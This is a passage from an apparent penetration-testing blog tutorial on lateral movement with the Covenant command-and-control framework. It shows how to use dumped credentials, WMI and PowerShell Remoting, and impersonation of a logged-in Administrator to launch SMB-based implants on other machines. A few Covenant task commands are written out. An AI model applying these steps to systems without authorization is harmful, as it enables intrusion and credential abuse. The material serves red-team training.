<br /><p></p><p>To access the Grunt, go to the Grunts section:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnyxcmh9FMmP82U6jHSqlwuEPMhCbxfO0RDFNSniQ3D_Hy3VSusImtrw6BmxpNCeRmkovTrRcRn-5_GCBU-uCXseUrVmaFrfz45rLO5ewPMxy2I4H1hT6aPVVqOZXA91oVdk8KRhKVzmx1SHzvG3ruECbDmGQDejU04887OZIfLwdJ4tb13qWyRQgC/s1380/wmigrunt_active3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="698" data-original-width="1380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnyxcmh9FMmP82U6jHSqlwuEPMhCbxfO0RDFNSniQ3D_Hy3VSusImtrw6BmxpNCeRmkovTrRcRn-5_GCBU-uCXseUrVmaFrfz45rLO5ewPMxy2I4H1hT6aPVVqOZXA91oVdk8KRhKVzmx1SHzvG3ruECbDmGQDejU04887OZIfLwdJ4tb13qWyRQgC/s16000/wmigrunt_active3.png" /></a></div><p>And here we go:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNyHL5Jo83KFK946YB0F-SBZgPzfN_T7uaF6DeHpix1Hvrzx-6NTFlrVIgit2c72QVLjQqQGStCFT_BuNHEslqXAPygYPA1F3AEdJgVisOrNH_25H1wkW3kP5tbgaTnfkS3qaf_qOVgj2R6sD2kjOrl50d24e0mbOV_F0eOLpsFGWRZ7NKqx7WmMiP/s670/wmigrunt_active4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="658" data-original-width="670" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNyHL5Jo83KFK946YB0F-SBZgPzfN_T7uaF6DeHpix1Hvrzx-6NTFlrVIgit2c72QVLjQqQGStCFT_BuNHEslqXAPygYPA1F3AEdJgVisOrNH_25H1wkW3kP5tbgaTnfkS3qaf_qOVgj2R6sD2kjOrl50d24e0mbOV_F0eOLpsFGWRZ7NKqx7WmMiP/s16000/wmigrunt_active4.png" /></a></div><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. (b) WMICommand (using dumped creds)</span></span></span></h3><p><span style="color: white;"><b>Configure launcher</b></span></p><p>Let's configure the PowerShell based Launcher in the Launchers section.
Note that I have selected <span style="color: white;">ImplantTemplate </span>as <span style="color: white;">GruntSMB </span>and <span style="color: white;">SMBPipeName </span>as <span style="color: white;">smbconnect_2</span>:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAq_dYcKXEzQBq7fOp_cnQKXXfGK2W6bDlr2e7IdR4EGWtmcP0WChP5CdG8WHEnQD7M2u_FBRZPKUKE1qobMGDMhVHUyY1c_wmsNeJijWlJcY1ORw3Ws1TJk3s-p1B4_-W8dzcqViuouvXFGxRbfDUrbKXtLRwiP2Au0Qxh9wsIeZyGJSC9IYIqjCN/s1613/wmic1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="766" data-original-width="1613" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAq_dYcKXEzQBq7fOp_cnQKXXfGK2W6bDlr2e7IdR4EGWtmcP0WChP5CdG8WHEnQD7M2u_FBRZPKUKE1qobMGDMhVHUyY1c_wmsNeJijWlJcY1ORw3Ws1TJk3s-p1B4_-W8dzcqViuouvXFGxRbfDUrbKXtLRwiP2Au0Qxh9wsIeZyGJSC9IYIqjCN/s16000/wmic1.png" /></a></div>After clicking the Generate button, copy the generated PowerShell payload.<br /><p></p><p></p><p><span style="color: white;">Don't forget to perform the MakeToken step (demonstrated in method 1(a)) </span><br /></p><p>Now,
switch to the Grunt and select the <span style="color: white;">WMICommand </span>task. Paste the PowerShell payload copied in the previous step into the <span style="color: white;">Command </span>input box, specify the other parameters and click the 'Task' button to launch the SMB Grunt on the target machine. The difference from WMIGrunt is that here we hand Covenant the launcher command line ourselves, so the same task can run any command on Machine B:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJKeXVp-EN8G_RDODaeatjrc4py46qfmJdn5AYBw2r7-UwEGaOEih11GmLHrkxUV2nVGvDxwAFq46UyWn9iTZDu84DqnY7Em7ePbAuAgYxxsMOjB36fDxbm6w-TisUeE1EnFsvbT_kjyD-KOP_v1GJwlblhU8N_BZXZihW1v-rkKSt_vnVgcm28OF4/s993/wmic2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="616" data-original-width="993" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJKeXVp-EN8G_RDODaeatjrc4py46qfmJdn5AYBw2r7-UwEGaOEih11GmLHrkxUV2nVGvDxwAFq46UyWn9iTZDu84DqnY7Em7ePbAuAgYxxsMOjB36fDxbm6w-TisUeE1EnFsvbT_kjyD-KOP_v1GJwlblhU8N_BZXZihW1v-rkKSt_vnVgcm28OF4/s16000/wmic2.png" /></a></div><br /> Upon successful execution, we will have output like this:<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFjiXJtuAXXyB698s0j_HINs_1mr14BvKQx_91_vf1iMz-0nmNS5UwRTYEKdz-FpQeRGjxEUHjxtKxQ8Z5ygAGip8g2Gr4MrDdoPIxofm3wk1ULeij4cj1hC1-EiSP5r639j35zKAXHOm0VvzVo0tUNdwCwxl6gOJhk1Q5cLAmY0klDtRpS23i0P2B/s1207/wmic3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="666" data-original-width="1207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFjiXJtuAXXyB698s0j_HINs_1mr14BvKQx_91_vf1iMz-0nmNS5UwRTYEKdz-FpQeRGjxEUHjxtKxQ8Z5ygAGip8g2Gr4MrDdoPIxofm3wk1ULeij4cj1hC1-EiSP5r639j35zKAXHOm0VvzVo0tUNdwCwxl6gOJhk1Q5cLAmY0klDtRpS23i0P2B/s16000/wmic3.png" /></a></div><br /><p>It's
time to connect to the launched Grunt using the Connect task. Specify the target host machine and <span style="color: white;">SMBpipename </span>and click the Task button:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaSa4SuJM8NPkoozPpKbWTY6Evlrb9p-N-wTFHYqa9aLVyaXgkTfswORbA8PYCz_IXQaaJ9-SdgfUFnMlkFXmYcOrDWBdKoutO1CEQQe72JPDFiaJvt--Ckxkiwsywp2GWpQuokVzEtaKWsBsljEE5Ky0siIFWzOdBIcjb9FAYQZwkcw1W7PMzIrQ6/s569/wmic4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="569" data-original-width="540" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaSa4SuJM8NPkoozPpKbWTY6Evlrb9p-N-wTFHYqa9aLVyaXgkTfswORbA8PYCz_IXQaaJ9-SdgfUFnMlkFXmYcOrDWBdKoutO1CEQQe72JPDFiaJvt--Ckxkiwsywp2GWpQuokVzEtaKWsBsljEE5Ky0siIFWzOdBIcjb9FAYQZwkcw1W7PMzIrQ6/s16000/wmic4.png" /></a></div><p>And we got a connection.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx5HonIxf6KJyCOiyh40n_kM8g-rxGMeZHVECXdMxn6HBt5QG5VVbmpS3c_0SuNGEHGl_LQyEucAbCIk5SigxHXHwzEBU-aObJ5OtLcaEVFYOJXZ3rkcSWJy_gluCwd_AiPicLvWK787-CwatS-OX7oughubmkLBhLzJ69FOxmu8mexrFhUnQPnM_1/s1245/wmic5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="619" data-original-width="1245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx5HonIxf6KJyCOiyh40n_kM8g-rxGMeZHVECXdMxn6HBt5QG5VVbmpS3c_0SuNGEHGl_LQyEucAbCIk5SigxHXHwzEBU-aObJ5OtLcaEVFYOJXZ3rkcSWJy_gluCwd_AiPicLvWK787-CwatS-OX7oughubmkLBhLzJ69FOxmu8mexrFhUnQPnM_1/s16000/wmic5.png" /></a></div><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. (c) PowerShellRemotingCommand (using dumped creds)</span></span></span></h3><p><span style="color: white;"><b>Configure launcher</b></span> <br /></p><p>For
this module, we need to configure PowerShell based Launcher. I have
selected the listener as http, selected ImplantTemplate as <span style="color: white;">GruntSMB</span>,
specified a name i.e. <span style="color: white;">smbconnect_power2</span> in <span style="color: white;">SMBpipename</span>, clicked
'Generate' button and copied the generated PowerShell based payload.<br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlukjEbwFYsLZNkOvK0f-p5k6IXwkzAnt5_PN8FvxXFI3iMn2LL_R6dkuOYK6jWz9J0GiBkF50-Lywbm5h5jxclOjiSG5FUlzAnrl8ifA2TOsUJYi-CRZfYxBp2jEUKDLL-ZfJ6kjjMQMCmz0mUnUttm8gaqaAPscjgNqGE-ukYrqOco968mm8UwAS/s1592/power2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="766" data-original-width="1592" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlukjEbwFYsLZNkOvK0f-p5k6IXwkzAnt5_PN8FvxXFI3iMn2LL_R6dkuOYK6jWz9J0GiBkF50-Lywbm5h5jxclOjiSG5FUlzAnrl8ifA2TOsUJYi-CRZfYxBp2jEUKDLL-ZfJ6kjjMQMCmz0mUnUttm8gaqaAPscjgNqGE-ukYrqOco968mm8UwAS/s16000/power2.png" /></a></div><p></p><p><span style="color: white;">Don't forget to perform the MakeToken step (demonstrated in method 1(a)) </span></p><p>Switch
to the Grunt and in the Task section, select the <span style="color: white;">PowerShellRemotingCommand </span>task, paste the copied PowerShell based payload (from the step above) into the command input box, and specify the other details such as username, password and domain (keep it . if the user is local and not a domain user). PowerShell Remoting rides on WinRM, so this only works if WinRM is enabled on Machine B (TCP 5985, or 5986 for HTTPS) and the account is allowed to use it (by default, members of Administrators or Remote Management Users):</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwGoo1l9k74aJV3ik32fq87i5htbryLu1Q_6zpBdXQ6cFnMbSff4dvBN5fYgU-eqNd_OEV2IMI-yv-3NdYSv3f-vUNdk_tQyUw_t9P2BDiojYc6Jfm9Vw3pAqiMjYcvCyE0z0fpYJ9B7AZT3-R9ZSwlP5Gl4Qk5_pLHpnYZuHD3tvK_hLgXNHf6UsW/s781/power3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="781" data-original-width="757" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwGoo1l9k74aJV3ik32fq87i5htbryLu1Q_6zpBdXQ6cFnMbSff4dvBN5fYgU-eqNd_OEV2IMI-yv-3NdYSv3f-vUNdk_tQyUw_t9P2BDiojYc6Jfm9Vw3pAqiMjYcvCyE0z0fpYJ9B7AZT3-R9ZSwlP5Gl4Qk5_pLHpnYZuHD3tvK_hLgXNHf6UsW/s16000/power3.png" /></a></div><br /> After clicking the 'Task' button, you will not get any output. <p></p><p>Now,
in 'Task' tab, select 'connect' and specify the target machine
hostname, smbpipename specified for the PowerShell based launcher (in my
case it was <span style="color: white;">smbconnect_power2</span>) and click 'Task' button:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJaqcvMYLMOKKPak8FOnyrceUHX1G_hEgBnCijfy-idBA7N3hmuMiLLaOR5-_nxk0zJFTdIMf4Q7QVeByh4LeOCqpfMGFLSN7wjr5Kf6rPl5AhizMknb6yYiabBzrAcUHRhelJjQAjMkBxApPT2ZqBzutGN70VQHTyWsYXQ6-0V1ddx8mMhO_Ak_km/s625/power5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="514" data-original-width="625" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJaqcvMYLMOKKPak8FOnyrceUHX1G_hEgBnCijfy-idBA7N3hmuMiLLaOR5-_nxk0zJFTdIMf4Q7QVeByh4LeOCqpfMGFLSN7wjr5Kf6rPl5AhizMknb6yYiabBzrAcUHRhelJjQAjMkBxApPT2ZqBzutGN70VQHTyWsYXQ6-0V1ddx8mMhO_Ak_km/s16000/power5.png" /></a></div><p>Wait for a while and you will have connection from remote machine:</p><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAZ_C6HQFIqmS8uyk6kJ4hgSe9o8a5KU0yHqCNpl8HQKKCbXBz7JpVl-w3GcLAgeX12_4iI_SdkYFK9eKGAwwQJaqc9IoIquRkqvVPM5loAUm4-HOkMVdP133tGDpTNm5fIU_H39JeYRsqKzyPurhe4Fsq6B07PKbofNZjP92lv34sXi9M55gcg-e/s1272/power4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="611" data-original-width="1272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAZ_C6HQFIqmS8uyk6kJ4hgSe9o8a5KU0yHqCNpl8HQKKCbXBz7JpVl-w3GcLAgeX12_4iI_SdkYFK9eKGAwwQJaqc9IoIquRkqvVPM5loAUm4-HOkMVdP133tGDpTNm5fIU_H39JeYRsqKzyPurhe4Fsq6B07PKbofNZjP92lv34sXi9M55gcg-e/s16000/power4.png" /></a></div><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. 
(d) PowerShellRemotingGrunt (using dumped creds)</span></span></span></h3><p><span style="color: white;"><b>Configure launcher</b></span> <br /></p><p>For
this module, we need to configure PowerShell based Launcher. I have
selected the listener as http, selected ImplantTemplate as <span style="color: white;">GruntSMB</span>,
specified a name i.e. <span style="color: white;">smbconnect_power2</span> in <span style="color: white;">SMBpipename</span>, clicked
'Generate' button and copied the generated PowerShell based payload.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAWZM_AnYVYd-e9J5UZggA7UolRyZSndFhpAKUdytKM6oOMMFgNXqdmSnO5s5Ja4vgmxWDhrAwfff2JPA-azKfP_h5hQvMvJ-oRTCMt22oLZyi1ZW0gso5f6n-tXaKfOT1ZxfRH4q33xiGjSj-aX-Vtmrc7qP7_FjZIajXFTUywQj_UqI9lekVjJqp/s954/pr1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="786" data-original-width="954" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAWZM_AnYVYd-e9J5UZggA7UolRyZSndFhpAKUdytKM6oOMMFgNXqdmSnO5s5Ja4vgmxWDhrAwfff2JPA-azKfP_h5hQvMvJ-oRTCMt22oLZyi1ZW0gso5f6n-tXaKfOT1ZxfRH4q33xiGjSj-aX-Vtmrc7qP7_FjZIajXFTUywQj_UqI9lekVjJqp/s16000/pr1.png" /></a></div><p></p><p></p><p><span style="color: white;">Don't forget to perform the MakeToken step (demonstrated in method 1(a)) </span></p><p>Switch
to the Grunt and in the Task section, select the <span style="color: white;">PowerShellRemotingGrunt </span>task, and specify the details such as ComputerName, Launcher, username, password and domain (keep it . if the user is local and not a domain user):</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDnMYW3fYW3P9t097l18e_4zC0m6nexobCwPqub8TkSVLD2iXX-TFtr0JM3UG44zPzX2XPkrbgaQjM2ZvrhnIi6as68mZvmSLjFbiibHawJC-5_nRO5Hv58md_8gcMZMIh08nAdDWPtLkRXQBWvjAciqcjLXPX21qWixUTMy2jYUmrFrKQhCMtgDhc/s786/pr2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="786" data-original-width="650" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDnMYW3fYW3P9t097l18e_4zC0m6nexobCwPqub8TkSVLD2iXX-TFtr0JM3UG44zPzX2XPkrbgaQjM2ZvrhnIi6as68mZvmSLjFbiibHawJC-5_nRO5Hv58md_8gcMZMIh08nAdDWPtLkRXQBWvjAciqcjLXPX21qWixUTMy2jYUmrFrKQhCMtgDhc/s16000/pr2.png" /></a></div><p></p><p></p><p>After clicking the 'Task' button, you will not get any output. </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMut52NnfACgDkInrMiHdTT1odoYzIFJ7D4nI4Btxe0gGqgQdARN-u6kUpBX5iiYgDyT6lCyvC9lKgI3mWVvjHol3fQAgw_B4oekFoeiwR6qA6lGRA30VOr6T5-KwAE8gEXXadUnJazJw76VYrx7ZGGiasU-8gAHdK_5Qh-5n4f30XOBpSJF_DYXu3/s1220/pr3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="135" data-original-width="1220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMut52NnfACgDkInrMiHdTT1odoYzIFJ7D4nI4Btxe0gGqgQdARN-u6kUpBX5iiYgDyT6lCyvC9lKgI3mWVvjHol3fQAgw_B4oekFoeiwR6qA6lGRA30VOr6T5-KwAE8gEXXadUnJazJw76VYrx7ZGGiasU-8gAHdK_5Qh-5n4f30XOBpSJF_DYXu3/s16000/pr3.png" /></a></div><br />Now,
in 'Task' tab, select 'connect' and specify the target machine
hostname, smbpipename specified for the PowerShell based launcher (in my
case it was <span style="color: white;">smbconnect_power1337</span>) and click 'Task' button:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj41yaS4tEOz1salv7BOcapFm4YEKL8dX-2q4fEDvDmFzXlUSkYyDq2VJRkyQhVoOyIqzu8PNrFMo8V5Xmp9jVV3D5XM37n3aDyfgcfZYfxmMWbdTO5sESYDIIZZROA7o6_5kr2GN-F1rjrNwIEXtbGo07FepUZtZC7nQYc8TBA5N7vE5T6YW_1niYm/s542/pr4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="516" data-original-width="542" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj41yaS4tEOz1salv7BOcapFm4YEKL8dX-2q4fEDvDmFzXlUSkYyDq2VJRkyQhVoOyIqzu8PNrFMo8V5Xmp9jVV3D5XM37n3aDyfgcfZYfxmMWbdTO5sESYDIIZZROA7o6_5kr2GN-F1rjrNwIEXtbGo07FepUZtZC7nQYc8TBA5N7vE5T6YW_1niYm/s16000/pr4.png" /></a></div><p></p><p>Wait for a while and you will have connection from remote machine:</p><div class="separator" style="clear: both; text-align: center;"></div><p></p><span style="font-weight: normal;"></span><p style="text-align: left;"><span style="font-weight: normal;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTlxo2U0Lb3ARZ3SMWgFRu-HBt7fcxNzl5V41khsWW_Ac811aJU7J20o6CfJTtt-oMcPwd6PNuh-cXxbnPTP9mkjL38UoLw4kl8mWSQfcvJjT8KvCGuUtzkFFEZkr_BHfE0Uo3BjhEY3J0sci4jnXu2S_hc7DnD9bqnJDXeX725abCMoZ3VVn8_HgK/s1269/pr5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="488" data-original-width="1269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTlxo2U0Lb3ARZ3SMWgFRu-HBt7fcxNzl5V41khsWW_Ac811aJU7J20o6CfJTtt-oMcPwd6PNuh-cXxbnPTP9mkjL38UoLw4kl8mWSQfcvJjT8KvCGuUtzkFFEZkr_BHfE0Uo3BjhEY3J0sci4jnXu2S_hc7DnD9bqnJDXeX725abCMoZ3VVn8_HgK/s16000/pr5.png" /></a></div><span style="font-weight: normal;"></span><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span 
style="font-weight: normal;">2. </span></span></span><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">Using Impersonated User session<br /></span></span></span></h3><p></p><p>Let's
assume we have a user 'Administrator' logged in to the compromised
machine and this user has access to machine B. To gain access as the
'Administrator' user on machine B, we need to take the following approach:</p><p><span style="color: white;"><b>Enumerate
logged in users -> Impersonate user -> Launch SMB grunt on
machine A with the privilege of impersonate user -> use new grunt
session to launch SMB grunt on Machine B</b></span></p><p><span style="color: #fcff01;">Enumerate logged in user</span></p><p>To enumerate logged-in user, Covenant has Task <span style="color: white;">GetNetLoggedOnUser</span>. Specify the machine Hostname and click <span style="color: white;">Task</span> button: <br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJOz7Csz9fh2RrAD0YnrOLxwrRKYwlhHssQqxIfoR_N2-TwBZbvtMCn91FX4H8Svo1EX7lbMo5hLFKeF0hYgAhpHBx3LIIb4WgKvzqkSADFWq5LIvJ4u8SHFFJbN0_HABOR-UBEzOyRRgjStis0izna_Ns760VaC9Sx_zeeoGbNGEG5u5vBqsd1L2E/s485/im1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="433" data-original-width="485" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJOz7Csz9fh2RrAD0YnrOLxwrRKYwlhHssQqxIfoR_N2-TwBZbvtMCn91FX4H8Svo1EX7lbMo5hLFKeF0hYgAhpHBx3LIIb4WgKvzqkSADFWq5LIvJ4u8SHFFJbN0_HABOR-UBEzOyRRgjStis0izna_Ns760VaC9Sx_zeeoGbNGEG5u5vBqsd1L2E/s16000/im1.png" /></a></div><p>We have a user <span style="color: white;">Administrator</span> logged-in to the compromised machine:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYzQpPXsyku9FC9JemSki86x-VitZDmQXVmHLi-4lZkV8fX82XATvPdmefqkXOuZC7zrSMzrq4SHvpeIuM3TpX_aDEmuiBqWfgTX5MaKaqP2zRQHYqeJaKpquRbiYdeVNpLDsHR1olCIwZOfkFvskAFYAB1fWkpsLaGzQWGdRvdMyl9tRW8L3lugmd/s686/im2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="542" data-original-width="686" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYzQpPXsyku9FC9JemSki86x-VitZDmQXVmHLi-4lZkV8fX82XATvPdmefqkXOuZC7zrSMzrq4SHvpeIuM3TpX_aDEmuiBqWfgTX5MaKaqP2zRQHYqeJaKpquRbiYdeVNpLDsHR1olCIwZOfkFvskAFYAB1fWkpsLaGzQWGdRvdMyl9tRW8L3lugmd/s16000/im2.png" /></a></div><p></p><p><span style="background-color: black;"><span style="color: #fcff01;">Impersonate logged in 
user</span></span></p><p>To impersonate the logged-in user, use the Task <span style="color: white;">ImpersonateUser</span>. Specify the username of the user whom we want to impersonate (include the domain name if the user is a domain user):</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWNngL5_LtBUvK5LyDOKDJmHWyurOHIAby8tHKJIE4ZqcPOY--BpmBEnd7fVTi1gJKEwVYLswiO8GF0k2JiWr7mq0LFXP8wAA_W4dJUYL4Pa09xqkF6o3dTn6mbQYRDOYa-PkCilo0aA5Ler5FCqDEUJyyvYuw_kiUlvdfMBTWJsfLzOU-GYBGg8E/s619/im3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="424" data-original-width="619" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWNngL5_LtBUvK5LyDOKDJmHWyurOHIAby8tHKJIE4ZqcPOY--BpmBEnd7fVTi1gJKEwVYLswiO8GF0k2JiWr7mq0LFXP8wAA_W4dJUYL4Pa09xqkF6o3dTn6mbQYRDOYa-PkCilo0aA5Ler5FCqDEUJyyvYuw_kiUlvdfMBTWJsfLzOU-GYBGg8E/s16000/im3.png" /></a></div><p>After successful impersonation, we will see the following message:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIO5WcnDK495v0JpWmdwNKMrLcO7gUSPkZxWKZEf6XCHlifNEqQA_NnSLOj0caHsKc0JsUD2ZCEWSeLq_9B8lCdP4ZPLjBORNgizxZPkBiDau6DnbCnbAXA5M2p4m1609UTsxh-elw8yjrsYZEVChAiNW6UVKqBr7gpfiY0jG5rhOuTHoyw4jWWKdp/s530/im4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="180" data-original-width="530" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIO5WcnDK495v0JpWmdwNKMrLcO7gUSPkZxWKZEf6XCHlifNEqQA_NnSLOj0caHsKc0JsUD2ZCEWSeLq_9B8lCdP4ZPLjBORNgizxZPkBiDau6DnbCnbAXA5M2p4m1609UTsxh-elw8yjrsYZEVChAiNW6UVKqBr7gpfiY0jG5rhOuTHoyw4jWWKdp/s16000/im4.png" /></a></div><p>Now, we just need to configure a Launcher and select <span style="color: white;">ImplantTemplate</span> as <span style="color: white;">GruntSMB</span>. 
In my case, I specified <span style="color: white;">SMBpipename </span>as <span style="color: white;">smb_pshell</span>:<br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPcJgyfB1pJQwmU0uRQdgiKJhUlN-7pl6MI0lZC7AdCGCdgQGnn6fHJCLM1v9UGZgepL1e4GL95ZV_x960aR1DdMb0u_fFZOHVdDN3fm6PwezI6e9uiDESQnFKVZ4HBj73gOJ9buHUG8ALoWt_tNSyvV-3s4qIjm00tHTVIyt-VLJEI_hm4mJANWT/s917/im5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="780" data-original-width="917" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPcJgyfB1pJQwmU0uRQdgiKJhUlN-7pl6MI0lZC7AdCGCdgQGnn6fHJCLM1v9UGZgepL1e4GL95ZV_x960aR1DdMb0u_fFZOHVdDN3fm6PwezI6e9uiDESQnFKVZ4HBj73gOJ9buHUG8ALoWt_tNSyvV-3s4qIjm00tHTVIyt-VLJEI_hm4mJANWT/s16000/im5.png" /></a></div><p></p><h3 style="text-align: left;"></h3><p><span style="background-color: black;"><span style="color: #fcff01;"><b> Launch SMB grunt on machine A with the privilege of impersonate user - WMIGrunt</b></span></span> <br /></p><p>Now,
launch the Grunt using WMI. This time, I am not going to specify the creds
because we already have access to a user who is logged in and can launch the grunt
on local machine.</p><p>Command will be:</p><p></p><textarea style="height: 28px; margin: 0px; width: 250px;">WMIGrunt hostname launcher</textarea><p>in my case it was </p><p></p><textarea style="height: 28px; margin: 0px; width: 250px;">WMIGrunt localhost powershell</textarea><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK6EjuAYaYI4tyrV2rkGqotXh73TeIfdnprYhVUU_kZphhxTU7r5T2gguFIwp4ZTI0lHsH98R6XuQrh3eHMcMxxidzaBO3GPaHsuP4J-66qJUiMYrFdu0G9NEnXXaV757TEdZBPZFrH1JEr04lKkTV8ogZExzpo4IrMBDuOg9KXMBqCA_C2t3mVVUz/s1230/im6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="579" data-original-width="1230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK6EjuAYaYI4tyrV2rkGqotXh73TeIfdnprYhVUU_kZphhxTU7r5T2gguFIwp4ZTI0lHsH98R6XuQrh3eHMcMxxidzaBO3GPaHsuP4J-66qJUiMYrFdu0G9NEnXXaV757TEdZBPZFrH1JEr04lKkTV8ogZExzpo4IrMBDuOg9KXMBqCA_C2t3mVVUz/s16000/im6.png" /></a></div><p>After Launching the grunt successfully, we need to connect to it using connect command because this is SMB based grunt.<br /></p><p>In my case it was:</p><p></p><p></p><textarea style="height: 28px; margin: 0px; width: 300px;">connect localhost smb_pshell</textarea><p></p><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1N0X0HcTtZ68yvp6pUrQe7EEzRNHSTaApg-tiHDGUGzfBz6Zh3RicIq2zsqQotByYVsxZ1kYDRHX_kwDm978A29ODbBNfUJAp7EJdbXpIpUSJZ48yR-T8mDDklwQMQYC3SPJ-G160vxxscK9K2r6alXfBBSi4NPoWFkZ0hIDI5sHdsFMzcMs4Ph5g/s1470/im7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="1470" 
